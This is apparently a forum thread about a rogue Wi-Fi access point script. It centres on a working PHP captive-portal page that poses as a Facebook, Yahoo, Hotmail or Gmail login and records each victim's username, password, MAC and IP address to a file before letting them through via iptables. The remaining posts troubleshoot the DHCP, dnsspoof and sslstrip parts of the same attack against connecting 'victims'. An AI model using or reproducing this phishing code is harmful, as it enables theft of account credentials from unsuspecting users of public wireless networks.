Printable View
@Bl4ckSky, you are using Google DNS (cue posts about privacy :D)
The script expects local DNS (e.g. 192.168.1.1)
Your easiest option might be to add a local DNS address (usually the same as your router/gateway) to your network (which should then update resolv.conf automatically).
Hey devi1, thanks indeed for the offer; was about to upload when I realised I've just fixed it :). The only problem was that "global $mac" was in the wrong place, so $mac was not being passed to iptables.Quote:
@VulpiArgenti, can you upload what you have so far with the new captive portal method? I'm not the greatest with php but I can take a look at it.
I'm actually going to leave the script as it is; the workaround with dnotify turns out to be useful (in setting iptables rules for sslstrip).
Here's the (not pretty but working) service.php
PHP Code:<?php
//Thanks to:
//http://www.andybev.com/index.php/Using_iptables_and_PHP_to_create_a_captive_portal
//http://simple-and-hot.blogspot.com.au/2010/05/you-can-do-it-yourself.html
//devi1
//error_reporting(E_ALL);
//ini_set ('display_errors', '1');
$name = $_POST['login'];
$password = $_POST['password'];
if($_POST['facebook']){
$service = "facebook";
}elseif($_POST['yahoo']){
$service = "yahoo";
}elseif($_POST['hotmail']){
$service = "hotmail";
}elseif($_POST['gmail']){
$service = "gmail";
}
sleep(1);
$error =
"<html>\n" .
"<head>\n" .
"<meta http-equiv=\"Refresh\" content=\"5;url=/\" />\n" .
"</head>\n" .
"<body>\n" .
"<center><p1><b>Login incorrect.</b></p1></center>\n" .
"<center><p1></p1></center>\n" .
"</body>\n" .
"</html>";
$success=
"<html>\n" .
"<head>\n" .
"</head>\n" .
"<body>\n" .
"<center><p1>Authorized</p1></center>\n" .
"<center><p1>Continue browsing</p1></center>\n" .
"</body>\n" .
"</html>";
$arp = "/usr/sbin/arp";
if(($password == "") || ($name == "")){
echo $error; // if credentials not entered
} else {
// Attempt to get the client's mac address
$mac = shell_exec("$arp -a ".$_SERVER['REMOTE_ADDR']);
preg_match('/..:..:..:..:..:../',$mac , $matches);
@$mac = $matches[0];
$ip = $_SERVER["REMOTE_ADDR"];
$accinfo = "login: $name pass: $password service: $service\nMAC: $mac IP: $ip\n----------------\n";
// Write out the credentials
$fp = fopen("formdata.txt", "a");
fwrite($fp, $accinfo);
fclose($fp);
if (!isset($mac)) { echo $error;
} else {
global $mac;
iptables();
echo $success; }
}
function iptables() {
global $mac;
// Allow through the captive portal
exec("sudo /sbin/iptables -t nat -I PREROUTING -m mac --mac-source $mac -j ACCEPT");
}
?>
A video tutorial for option 3 will be great :)
Good idea. Why don't you make one? :D
The Author knows better how to present it :)
hello VulpiArgenti, sorry i couldn't answer sooner...anyway when the victim connects the DCHP tail stays empty, and so the dnsspoof. the only signal i have about the connection is just the first eterm window, where i get the mac of the victim, and nothing else. so obviously the problem resides in the DHCP server...i tried to remove/reinstall the whole DHCP group but without success :( maybe something in the configuration of the server? i don't modify the default values you included in the script, i just add the channel of the fake ap. thank you again for your patience :o
Quote:
Originally Posted by VulpiArgenti
Hi bugme, it does sound like a DHCP problem. Could you post the config file the script generates (cat /tmp/dhcpd.conf)?
Also suggest trying a static IP (in the range 192.168.0.100-200) on your victim, and also different clients (smartphone etc)
Signed up for this forum specifically to respond to this post.
Fantastic script.
Just downloaded, going to play with it tonight.
Hi
I am having trouble with dhcp
client connects and never gets an IP address
the file /tmp/dhcpd.conf does not exist
tried working through script and the line I am having problem with is
line 720 mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd
I get invalid user dhcpd:dhcpd from the section "chown dhcpd:dhcpd /var/run/dhcpd"
is it permissions set wrong or some other basic problem ?
many thanks
Quote:
Originally Posted by VulpiArgenti
default-lease-time 300;
max-lease-time 360;
ddns-update-style none;
authoritative;
log-facility local7;
subnet 192.168.0.0 netmask 255.255.255.0 {
range 192.168.0.100 192.168.0.200;
option routers 192.168.0.1;
option domain-name-servers 192.168.2.1;
}
i tried a couple of devices, with no real result...using a static IP in the range (192.168.0.101) indeed gave me a line with the name of the device in DHCP server tail, but no connection/spoof/fake html page on the victim